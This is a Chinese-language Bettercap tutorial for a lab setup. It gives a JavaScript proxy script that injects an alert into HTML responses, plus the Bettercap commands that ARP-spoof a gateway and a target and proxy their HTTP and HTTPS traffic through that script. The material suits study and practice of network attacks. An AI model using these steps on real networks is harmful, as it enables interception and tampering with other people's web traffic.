Bettercap使用教程

0x00 目标

  • 模拟arp欺骗,修改靶机IP的http和https返回包。

0x01 测试环境

  • 名称IP备注攻击192.168.2.x虚拟机 kali靶机192.168.2.x客户机 win10

0x02 测试步骤

function onResponse(req,res){
    if(res.ContentType.indexOf('text/html')==0){
        var body=res.ReadBody();
        if(body.indexOf('</head>')!=-1){
            res.Body=body.replace(
                '</head>',
               '<script type="text/javascript">alert("your computer has hacked!")</script></head>'
            );
            }
        }
}
  • 在kali /home/test 目录下写一个js脚本
  • 启动bettercap
  • 设置攻击目标
  • set arp.spoof.targets 192.168.2.1,192.168.2.181 #设置arp欺骗的目标,这里欺骗的是网关和目标机器set http.proxy.script /home/test/1.js #往http流量中注入脚本set https.proxy.script /home/test/1.js #往https流量中注入脚本http.proxy on #开启HTTP代理https.proxy on #开启HTTPS代理arp.spoof on #开启ARP欺骗
  • 靶机访问http,https网站
温馨提示: 本文最后更新于2022-08-12 21:24:03,某些文章具有时效性,若有错误或已失效,请在下方 留言或联系 购印资源网
© 版权声明
THE END
喜欢就支持一下吧
评论 抢沙发

请登录后发表评论

    暂无评论内容